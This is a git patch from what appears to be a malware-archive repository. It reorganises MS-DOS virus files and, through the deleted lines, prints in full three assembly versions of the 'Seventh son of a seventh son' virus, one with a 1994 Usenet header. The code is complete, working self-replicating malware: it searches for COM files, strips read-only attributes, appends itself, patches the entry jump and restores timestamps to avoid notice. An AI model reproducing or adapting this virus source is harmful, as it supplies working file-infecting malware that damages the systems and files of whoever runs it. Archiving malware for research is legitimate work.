From 62ca392943e3a5bb330f8b03bfc976f17910011a Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Sun, 21 Aug 2022 04:12:28 -0500
Subject: [PATCH] fix/re-organize
---
.../0 - 9 Index/Virus.MSDOS.Unknown.7son.asm | 251 ------------------
.../0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm | 232 ----------------
.../0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm | 218 ---------------
...nown.3apa3a.asm => Virus.MSDOS.3apa3a.asm} | 0
MSDOS/Virus.MSDOS.7son.7z | Bin 0 -> 2731 bytes
...known._468.asm => Virus.MSDOS.Azagoth.asm} | 0
...st_star.asm => Virus.MSDOS.First-Star.asm} | 0
...nown.1stvirus.asm => Virus.MSDOS.Gogi.asm} | 0
8 files changed, 701 deletions(-)
delete mode 100644 MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm
delete mode 100644 MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm
delete mode 100644 MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm
rename MSDOS/{0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm => Virus.MSDOS.3apa3a.asm} (100%)
create mode 100644 MSDOS/Virus.MSDOS.7son.7z
rename MSDOS/{0 - 9 Index/Virus.MSDOS.Unknown._468.asm => Virus.MSDOS.Azagoth.asm} (100%)
rename MSDOS/{0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm => Virus.MSDOS.First-Star.asm} (100%)
rename MSDOS/{0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm => Virus.MSDOS.Gogi.asm} (100%)
diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm
deleted file mode 100644
index 9e1c79c2..00000000
--- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm
+++ /dev/null
@@ -1,251 +0,0 @@ -From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994 -Xref: netcom.com alt.comp.virus:506 -Path: netcom.com!ix.netcom.com!netnews -From: Zeppelin@ix.netcom.com (Mr. G) -Newsgroups: alt.comp.virus -Subject: 7th Son Virus -Date: 29 Nov 1994 13:02:59 GMT -Organization: Netcom -Lines: 236 -Distribution: world -Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com> -References: -NNTP-Posting-Host: ix-pas2-10.ix.netcom.com - -;*********************************************************************** -***** -;* Seventh son of a seventh son version 4 -;* -;* Compile with MASM 4.0 -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;*********************************************************************** -***** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - - .RADIX 16 - -FILELEN equ end - start -MINTARGET equ 1000d -MAXTARGET equ -(FILELEN+40) - - - -;*********************************************************************** -***** -;* Dummy program (infected) -;*********************************************************************** -***** - - org 100 - -begin: db 4Dh ;virus mark - db 0E9h, 4, 0 ;jump to virus entry - - -;*********************************************************************** -***** -;* Begin of the virus -;*********************************************************************** -***** - -start: db 0CDh, 20h, 0, 0 - - cld - mov si,0100h - push si ;push new IP on stack - mov di,si - add si,[si+2] ;si -> start - - push si ;restore original begin - movsw - movsw - pop si - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - lea dx,[si+(offset ni24 - 0104)] ;set new int24 -vector - mov ah,25h - push ax - int 21 - - mov ah,2Fh 
;get DTA adres - int 21 - push es - push bx - - add dx,070h ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - push dx - - lea di,[si+(offset generation-0104)] ;check -generation - cmp [di],0707h - jne verder - - lea dx,[di+2] ;7th son of a 7th son! - mov ah,09h - int 21 - -verder: mov ax,[di] ;update generations - xchg ah,al - mov al,1 - mov [di],ax - - lea dx,[di+33d] ;find first COM-file - xor cx,cx - mov ah,4Eh -infloop: int 21 - pop dx - jc stop - - push dx - - xor cx,cx ;clear -read-only-arttribute - mov ax,4301 - int 21 - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - mov dx,si - mov ah,3fh - int 21 - - cmp byte ptr [si],4Dh ;already infected or an -EXE? - je return2 - cmp byte ptr [si],5Ah ;or a weird EXE? - je return2 - - mov al,2 ;go to end of file - call seek - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of -file - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? 
- pop ax - jnz return2 - - xchg ax,bp - mov al,0 ;go to begin of file - call seek - - mov word ptr [si],0E94Dh ;write mark and -jump-command - mov word ptr [si+2],bp - mov ah,40h - int 21 - - inc byte ptr [di] ;number of next son - -return2: pop dx ;restore file date & -time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: mov ah,4Fh ;find next file - jmp short infloop - -stop: pop dx ;restore DTA adres - pop ds - mov ah,1Ah - int 21 - - pop ax ;restore int24 vector - pop ds - pop dx - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - push cs - push cs - pop ds - pop es - - ret - -seek: mov ah,42 - cwd -int21: xor cx,cx - int 21 - mov cl,4 - mov dx,si - ret - - -;*********************************************************************** -***** -;* Interupt handler 24 -;*********************************************************************** -***** - -ni24: mov al,03 - iret - - -;*********************************************************************** -***** -;* Data -;*********************************************************************** -***** - -generation db 1,1 -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - - - diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm deleted file mode 100644 index 1ca91447..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm +++ /dev/null 
@@ -1,232 +0,0 @@ -;**************************************************************************** -;* Seventh son of a seventh son version 2 -;**************************************************************************** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - -FILELEN equ end - start -MINTARGET equ 1000 -MAXTARGET equ -(FILELEN+40h) - - org 100h - - .RADIX 16 - - -;**************************************************************************** -;* Dummy program (infected) -;**************************************************************************** - -begin: db 4Dh - jmp start - - -;**************************************************************************** -;* Begin of the virus -;**************************************************************************** - -start: call start2 -start2: pop bp - sub bp,0103h - - lea si,[bp+offset begbuf-4] ;restore begin of file - mov di,0100h - movsw - movsw - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - xor dl,dl ;clear the flag - mov ax,3301h - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - mov dx,offset ni24 - 4 ;set new int24 vector - add dx,bp - mov ax,2524h - int 21 - - lea dx,[bp+offset end] ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - mov word ptr [bp+offset nameptr-4],dx - - lea si,[bp+offset grandfather-4] ;check generation - cmp [si],0606h - jne verder - - lea dx,[bp+offset sontxt-4] ;7th son of a 7th son! 
- mov ah,09h - int 21 - -verder: mov ax,[si] ;update generations - xchg ah,al - xor al,al - mov [si],ax - - lea dx,[bp+offset filename-4] ;find first COM-file - xor cx,cx - mov ah,4Eh - int 21 - -infloop: mov dx,word ptr [bp+offset nameptr-4] - call infect - - mov ah,4Fh ;find next file - int 21 - jnc infloop - - pop ds ;restore int24 vector - pop dx - mov ax,2524h - int 21 - - pop dx ;restore ctrl-break flag - mov ax,3301h - int 21 - - push cs - push cs - pop ds - pop es - mov ax,0100h ;put old start-adres on stack - push ax - - ret - - -;**************************************************************************** -;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) -;**************************************************************************** - -infect: cld - - mov ax,4300h ;ask attributes - int 21 - push cx - - xor cx,cx ;clear flags - call setattr - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - lea dx,[bp+offset begbuf-4] - mov ah,3fh - int 21 - - mov al,byte ptr [bp+begbuf-4] ;already infected? - cmp al,4Dh - je return2 - cmp al,5Ah ;or a weird EXE? - je return2 - - call endptr ;get file-length - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of file - lea dx,[bp+offset start-4] - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? 
- pop ax - jnz return2 - - sub ax,4 ;calculate new start-adres - mov word ptr [bp+newbeg-2],ax - - call beginptr ;write new begin of file - mov cx,4 - lea dx,[bp+offset newbeg-4] - mov ah,40h - int 21 - - inc byte ptr [si] ;number of next son - -return2: pop dx ;restore file date & time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: pop cx ;restore file-attribute -; call setattr - -; ret - - -;**************************************************************************** -;* Changes file-attributes -;**************************************************************************** - -setattr: mov dx,word ptr [bp+offset nameptr-4] - mov ax,4301h - int 21 - ret - - -;**************************************************************************** -;* Subroutines for file-pointer -;**************************************************************************** - -beginptr: mov ax,4200h ;go to begin of file - jmp short ptrvrdr - -endptr: mov ax,4202h ;go to end of file -ptrvrdr: xor cx,cx - xor dx,dx - int 21 - ret - - -;**************************************************************************** -;* Interupt handler 24 -;**************************************************************************** - -ni24: mov al,03 - iret - - -;**************************************************************************** -;* Data -;**************************************************************************** - -begbuf db 0CDh, 20h, 0, 0 -newbeg db 4Dh, 0E9h, 0, 0 -nameptr dw ? -sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' -grandfather db 0 -father db 0 -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - \ No newline at end of file diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm b/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm deleted file mode 100644 index 1d83115b..00000000 --- a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm +++ /dev/null 
@@ -1,218 +0,0 @@ -;**************************************************************************** -;* Seventh son of a seventh son version 4 -;* -;* Compile with MASM 4.0 -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;**************************************************************************** - -cseg segment - assume cs:cseg,ds:cseg,es:cseg,ss:cseg - - .RADIX 16 - -FILELEN equ end - start -MINTARGET equ 1000d -MAXTARGET equ -(FILELEN+40) - - - -;**************************************************************************** -;* Dummy program (infected) -;**************************************************************************** - - org 100 - -begin: db 4Dh ;virus mark - db 0E9h, 4, 0 ;jump to virus entry - - -;**************************************************************************** -;* Begin of the virus -;**************************************************************************** - -start: db 0CDh, 20h, 0, 0 - - cld - mov si,0100h - push si ;push new IP on stack - mov di,si - add si,[si+2] ;si -> start - - push si ;restore original begin - movsw - movsw - pop si - - mov ax,3300h ;get ctrl-break flag - int 21 - push dx - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524h ;get int24 vector - int 21 - push bx - push es - - lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector - mov ah,25h - push ax - int 21 - - mov ah,2Fh ;get DTA adres - int 21 - push es - push bx - - add dx,070h ;set new DTA adres - mov ah,1Ah - int 21 - add dx,1Eh - push dx - - lea di,[si+(offset generation-0104)] ;check generation - cmp [di],0707h - jne verder - - lea dx,[di+2] ;7th son of a 7th son! 
- mov ah,09h - int 21 - -verder: mov ax,[di] ;update generations - xchg ah,al - mov al,1 - mov [di],ax - - lea dx,[di+33d] ;find first COM-file - xor cx,cx - mov ah,4Eh -infloop: int 21 - pop dx - jc stop - - push dx - - xor cx,cx ;clear read-only-arttribute - mov ax,4301 - int 21 - jc return1 - - mov ax,3D02h ;open the file - int 21 - jc return1 - xchg bx,ax - - mov ax,5700h ;get file date & time - int 21 - push cx - push dx - - mov cx,4 ;read begin of file - mov dx,si - mov ah,3fh - int 21 - - cmp byte ptr [si],4Dh ;already infected or an EXE? - je return2 - cmp byte ptr [si],5Ah ;or a weird EXE? - je return2 - - mov al,2 ;go to end of file - call seek - - cmp ax,MAXTARGET ;check length of file - jnb return2 - cmp ax,MINTARGET - jbe return2 - - push ax - mov cx,FILELEN ;write program to end of file - mov ah,40h - int 21 - cmp ax,cx ;are all bytes written? - pop ax - jnz return2 - - xchg ax,bp - mov al,0 ;go to begin of file - call seek - - mov word ptr [si],0E94Dh ;write mark and jump-command - mov word ptr [si+2],bp - mov ah,40h - int 21 - - inc byte ptr [di] ;number of next son - -return2: pop dx ;restore file date & time - pop cx - mov ax,5701h - int 21 - - mov ah,3Eh ;close the file - int 21 - -return1: mov ah,4Fh ;find next file - jmp short infloop - -stop: pop dx ;restore DTA adres - pop ds - mov ah,1Ah - int 21 - - pop ax ;restore int24 vector - pop ds - pop dx - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - push cs - push cs - pop ds - pop es - - ret - -seek: mov ah,42 - cwd -int21: xor cx,cx - int 21 - mov cl,4 - mov dx,si - ret - - -;**************************************************************************** -;* Interupt handler 24 -;**************************************************************************** - -ni24: mov al,03 - iret - - -;**************************************************************************** -;* Data -;**************************************************************************** - -generation db 1,1 -sontxt db 
'Seventh son of a seventh son',0Dh, 0Ah, '$' -filename db '*.COM',0 - db '‚¨°³±' - -end: - -cseg ends - end begin - - \ No newline at end of file
diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm b/MSDOS/Virus.MSDOS.3apa3a.asm
similarity index 100%
rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm
rename to MSDOS/Virus.MSDOS.3apa3a.asm
diff --git a/MSDOS/Virus.MSDOS.7son.7z b/MSDOS/Virus.MSDOS.7son.7z new file mode 100644 index 0000000000000000000000000000000000000000..c3bdc87168e4257817f54fd735e0c6406a405ac3 GIT binary patch literal 2731 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 literal 0 HcmV?d00001 diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm b/MSDOS/Virus.MSDOS.Azagoth.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm rename to MSDOS/Virus.MSDOS.Azagoth.asm diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm b/MSDOS/Virus.MSDOS.First-Star.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm rename to MSDOS/Virus.MSDOS.First-Star.asm diff --git a/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm b/MSDOS/Virus.MSDOS.Gogi.asm similarity index 100% rename from MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm rename to MSDOS/Virus.MSDOS.Gogi.asm